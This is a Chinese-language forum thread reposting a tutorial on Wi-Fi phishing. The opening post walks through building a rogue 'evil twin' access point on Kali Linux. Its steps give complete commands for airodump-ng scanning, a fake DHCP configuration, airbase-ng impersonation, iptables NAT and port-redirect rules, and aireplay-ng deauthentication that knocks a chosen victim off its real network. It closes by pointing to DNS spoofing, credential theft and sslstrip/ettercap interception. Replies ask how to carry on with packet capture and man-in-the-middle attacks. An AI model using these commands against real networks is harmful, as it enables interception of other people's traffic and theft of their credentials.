ubnt解决方案
查看: 4746|回复: 22

技术分享:WIFI钓鱼的入门姿势 来自FreeBuf黑客与极客(FreeBuf.COM)

[复制链接]

95

回帖

608

积分

248 小时

在线时间

中尉

注册时间
2009-12-20
金币
485 个
威望
0 个
荣誉
0 个
累计签到:18 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2016-3-18 18:37
简介

该实验先是搭建一个测试环境,然后创建一个假的无线接入点,把网络连接连接到假的接入点并且强迫用户连接假的无线点。

事先准备

1.无线网卡:无线网卡用于数据包的嗅探和注入。

2. Backtrack或者Kali Linux: 攻击平台

3.无线网络:确保该无线由用户使用,并且能控制这个无线接入点。

4.一个目标机器:这个机器可以是你的物理机或者虚拟机。本次实验中用到的是Windows 7 虚拟机

开始实验:创建一个流氓接入点第一步:

启动虚拟机,选择kali linux 。点击”编辑虚拟机设置(Edit virtual machine settings)”,进入到“网络适配器(Network Adapter)”选项,在网络连接中选择“桥接(Bridged)”:


第二步:

开启kali 用root账户登录。

第三步:

连接笔记本的无线网卡。确保在Removable Devices选项下的无线网卡选项前面有一个蓝色的对钩。如果没有,需要选择无线网卡来让无线网卡从Windows系统中断开,连接到kali linux虚拟机,如下图所示:



第四步:

打开终端,输入如下命令检查IP地址和网关。   


在本例中,网关是192.168.0.1

第五步:

先是用以下命令列出所有网卡列表,如下图:

可以看到一个名字是wlan5的网卡,就是这个了。

第六步:

检查下用户附近的无线AP是否都可用,用如下命令,截图如下:

airodump-ng wlan5

这个命令后将会开始捕捉数据包,并且把用户附近的访问点列出来,其中BSSID是无线AP的MAC地址,Channel代表频率。注意PWR列的值,越靠近的路由器这个值越小。


第七步:

记下AP点的BSSID 和Channel的值。此外,还要记下目标设备的MAC地址。

在这个例子中,BISSID值是5E:F9:6A:29:28:18,Channel的值是2。目标机器的MAC地址是68:5D:43:7D:F7:E9

第八步:

我们必须建立一个假的DHCP服务器来提供一个假的AP接入点。在kali中执行以下命令就可以创建一个DHCP:

apt-get install isc-dhcp-server

建立好后,修改DHCP配置文件,如下:

leafpad /etc/dhcpd.confauthoraitative;default-lease-time 600;max-lease-time 7200;subnet 192.168.1.0 netmask 255.255.255.0 {option routers 192.168.1.1;option subnet-mask 255.255.255.0;option domain-name “Epson_Printer”;option domain-name-servers 192.168.1.1;range 192.168.1.2 192.168.1.40;}

保存并关闭配置文件。

对/etc/dhcpd/dhcpd.conf文件重复上述操作。

第九步:

打开终端,执行以下命令,创建一个ESSID名和受害者访问AP相似的AP接入点,例子中我们用“Epson_Printer”。

airbase-ng –e Epson_Printer -c 2 wlan5
l e 是AP接入点的ESSID(MAC地址)
l c是无线网络的频率
l Wlan5是网卡名

现在,名叫“Epson_Printer”的新的AP接入点创建完成。


第十步:

现在,我们打开一个新的终端,开始监控这个钓鱼AP,执行如下命令:

airodump-ngbssid 00:C0:CA:70:8F:25 -C 2 wlan 5


第十一步:

检查第五步的产生的窗口,新建的AP接入点应该是可以看见的:


第十二步:

现在,我们必须向网络提供这个假的无线AP。打开终端,依次输入如下命令:

·  ifconfig at0 192.168.1.1 netmask 255.255.255.0·  ifconfig at0 mtu 1400·  route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1·  iptables –flush·  iptables –table nat –flush·  iptables –delete-chain·  iptables –table nat –delete-chain·  echo 1 > /proc/sys/net/ipv4/ip_forward·  iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.0.1(gateway)·  iptables -P FORWARD ACCEPT·  iptables –append FORWARD –in-interface at0 -j ACCEPT·  iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE·  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000·  dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0·  /etc/init.d/isc-dhcp-server start

   


第十三步:

我们可以等待别人连接这个假的无线AP,也可以用de-authenticate攻击强行迫使我们的目标重新连接AP,这样我们就能乘机抓包。

我们可以用以下命令来执行:

aireplay-ngdeauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5
  5E:F9:6A:29:28:18 是无线AP的MAC地址
0 代表进行de-authentication.
-c 是目标机器的MAC地址
wlan5 是网卡

以下截图中可以看到,无线网卡正在发送de-authentication数据包给目标无线AP。目标机器就和“Epson_Printer” 连接点断开了,并且开始尝试重新连接,如下图:   

第十四步:

由于连续发送deauth包,客户端一直无法连接到原来的无线AP,于是就开始尝试连接其他最强的无线AP,我们的假AP信号很强,于是就开始连了。如下图:



第十五步:

查看airodump-ng命令窗口。可以在终端中查看到连接的设备:   


现在,受害者的设备已经连接到我们的假的无线AP中了。从这里开始,攻击者可以施行各种手段,比如说DNS欺骗用户连接一个假的网站,获取到用户认证信息,或者用 sslstrip 和ettercap 进行中间人攻击


今天最想说的话

67

回帖

155

积分

82 小时

在线时间

上等兵

注册时间
2012-8-7
金币
71 个
威望
0 个
荣誉
0 个
累计签到:16 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2016-7-1 13:12
重要是  deauth工具后 ,断网的客户端怎么自动连接到你的假ap上面
手机连接ap时会自动在wpa_supplicant.conf 文件中查找连接过的wifi配置文件 如果你没有连接过这个ap  或配置文件没有这个ap的配置也是不行  

482

回帖

2620

积分

437 小时

在线时间

少校

注册时间
2013-11-9
金币
2060 个
威望
2 个
荣誉
1 个
累计签到:337 天
连续签到:0 天
[LV.365]无线熟人
发表于 2016-3-18 20:32
主要想问后面的怎么操作?比如抓取数据包之类的!

87

回帖

1430

积分

1315 小时

在线时间

论坛巡察员

巡查员

注册时间
2009-10-28
金币
1178 个
威望
4 个
荣誉
1 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2016-3-18 20:39
貌似在孙大大那也看了这篇帖子

262

回帖

988

积分

92 小时

在线时间

中尉

注册时间
2010-3-6
金币
713 个
威望
0 个
荣誉
0 个
累计签到:58 天
连续签到:0 天
[LV.100]试剑无线
发表于 2016-3-18 23:32
谢谢分享。。。

777

回帖

5672

积分

2586 小时

在线时间

中校

注册时间
2013-5-13
金币
4567 个
威望
1 个
荣誉
0 个
累计签到:1288 天
连续签到:0 天
[LV.1825]无线元老
发表于 2016-3-19 11:18
玩命令的太高深 不会

317

回帖

2064

积分

435 小时

在线时间

少校

注册时间
2012-4-7
金币
1665 个
威望
0 个
荣誉
0 个
累计签到:121 天
连续签到:0 天
[LV.200]无线新星
发表于 2016-3-19 22:40 来自手机
不会弄,貌似太高深了

98

回帖

2946

积分

108 小时

在线时间

少校

注册时间
2013-11-4
金币
2829 个
威望
0 个
荣誉
0 个
累计签到:296 天
连续签到:0 天
[LV.365]无线熟人
发表于 2016-3-20 12:32
主要想问后面的怎么操作?

8

回帖

99

积分

25 小时

在线时间

上等兵

注册时间
2015-12-20
金币
77 个
威望
1 个
荣誉
0 个
累计签到:16 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2016-3-20 22:51
都是命令行,看不懂

6

回帖

97

积分

30 小时

在线时间

上等兵

注册时间
2013-1-7
金币
88 个
威望
0 个
荣誉
0 个
累计签到:7 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2016-5-17 20:53
都是命令行,看不懂

586

回帖

1360

积分

220 小时

在线时间

上尉

注册时间
2010-1-19
金币
700 个
威望
4 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2016-5-19 13:36
{:1_1:}{:1_1:}{:1_1:}

83

回帖

361

积分

48 小时

在线时间

少尉

注册时间
2012-3-16
金币
251 个
威望
2 个
荣誉
1 个
累计签到:12 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2016-5-19 23:04
最后的中间人攻击怎么来。前面最有难度的地方是iptables,这个想要弄明白得不少时间
今天签到了吗?请选择您此刻的

4

回帖

62

积分

6 小时

在线时间

上等兵

注册时间
2015-8-3
金币
57 个
威望
0 个
荣誉
0 个
累计签到:4 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2016-5-20 08:49
支持下!!!!

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-4-25 11:35

返回顶部 返回列表